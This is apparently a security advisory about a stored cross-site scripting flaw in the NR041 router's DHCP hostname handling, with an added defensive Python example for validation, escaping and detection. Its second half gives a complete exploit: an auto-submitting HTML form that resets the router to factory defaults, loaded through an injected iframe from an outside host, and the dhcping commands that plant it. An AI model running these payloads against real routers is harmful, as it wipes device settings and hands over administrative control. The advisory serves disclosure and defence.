The Network Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your Cable or DSL modem. The router lets your PCs share one IP address from your ISP, files, printers and other resources. It can also function as a DHCP server for easy IP assignment".
The DHCP HOSTNAME option supplied by clients is not filtered for malicious content. As a result, script code can be injected through it and stored on the router.
Credit:
The information has been provided by Mathieu Lacroix.
Vulnerable Systems:
* NR041 firmware revision 1.2 release 03
Since the router does not filter out potentially problematic content, it is easy to inject script code into the web-based administrative interface. When the administrator later views the DHCP page, the browser executes the script inside the open administrative session, and because of that session the script has full access to the router. One simple attack is for the script to reset the router to its factory defaults, which also rolls back the administration password.
Since the DHCP daemon is only reachable from within the local network, the vulnerability is hard to exploit from outside. However, wherever a way exists to issue DHCP requests to the router, it can be exploited.
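The two controls the advisory implies the router lacks are an input-side allow-list on the hostname option and output-side HTML escaping when the lease table is rendered. The following Python is an added example written for this page, not code from the advisory or from the NR041 firmware; the lease table is constructed, and the three odd hostnames are the fragments quoted later in this advisory. It validates a hostname against the RFC 1123 grammar, escapes every client-supplied field before it reaches the administrator's browser, and flags stored leases whose hostname would never have passed the allow-list, which is what you would run over an exported lease table to detect this kind of injection.

```python
import html
import re

# RFC 1123 hostname label: letters, digits and hyphen, no leading or
# trailing hyphen, 1 to 63 characters.
_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(name: str) -> bool:
    """Input-side control: strict allow-list for a DHCP client hostname
    (DHCP option 12). Anything that is not a syntactically valid hostname
    is rejected, so markup characters such as < > ' " / never get stored."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in name.split("."))


def render_lease_row(ip: str, mac: str, hostname: str) -> str:
    """Output-side control: HTML-escape every client-supplied field before
    it is placed in the administrative page, whether or not it was validated
    when it was stored. quote=True also escapes ' and ", which matters when
    the value lands inside an attribute."""
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
        html.escape(ip, quote=True),
        html.escape(mac, quote=True),
        html.escape(hostname, quote=True),
    )


def find_suspicious_leases(leases):
    """Detection: return the (ip, mac, hostname) entries whose hostname fails
    the allow-list, for reviewing a lease table exported from a device that
    did not validate on input."""
    return [lease for lease in leases if not is_valid_hostname(lease[2])]


# Constructed sample lease table. The first entry is benign; the other three
# carry the hostname fragments quoted in this advisory.
SAMPLE_LEASES = [
    ("192.168.1.100", "00:11:22:33:44:55", "laptop-01"),
    ("192.168.1.121", "af:af:af:af:af:af", "/../a.htm' > "),
    ("192.168.1.122", "af:af:af:af:af:ae", "'src='//url.ca/"),
    ("192.168.1.123", "af:af:af:af:af:ad", "<iframe id=' "),
]

if __name__ == "__main__":
    for lease in find_suspicious_leases(SAMPLE_LEASES):
        print("suspicious hostname from %s (%s): %r" % (lease[0], lease[1], lease[2]))
    for lease in SAMPLE_LEASES:
        print(render_lease_row(*lease))
```

Both controls belong in the firmware: the allow-list stops the payload from being stored at all, and the escaping ensures that even a value stored by an older firmware revision is displayed as inert text rather than parsed as markup.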
A proof of concept can be carried out using DHCPing, available from http://c3rb3r.openwall.net/dhcping/.
As mentioned above, the NR041 is configured through a web-based administrative interface made up of several CGIs invoked with the HTTP POST method. Exploitation is not entirely easy under these circumstances (a 15-character string that cannot be broken wherever you wish), but a known trick from the exploitation of the D-Link 614+ can be used to help.
* Step 1:
Because there isn't enough room to carry out the whole exploitation in one shot, a different approach can be used: injecting code for an IFRAME that forces the browser to remotely load a certain HTML file, for example "a.htm", on a malicious website. This file contains a form that auto-submits itself when loaded. The code for such an HTML file is presented below; note that, because of the length limitation, the filename should be as short as possible:
<html><head>
<script language="JavaScript">
<!--
function SymError()
{
  return true;
}
window.onerror = SymError;
//-->
</script>
<script language="javascript">
function autopost(){
}
</script>
</head><body onload="javascript:document.xx.submit();">
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">
<input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>
The actual attack carried out by this HTML file is to call passwd.cgi with the FactoryDefaults option enabled. Notice that the router's IP address is hardcoded in this file, but it could instead be taken from the HTTP Referer header, making the script work seamlessly.
* Step 2:
Inject the script containing the IFRAME using DHCPing, like so:
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 -opthostname "<iframe id=' " -m af:af:af:af:af:ad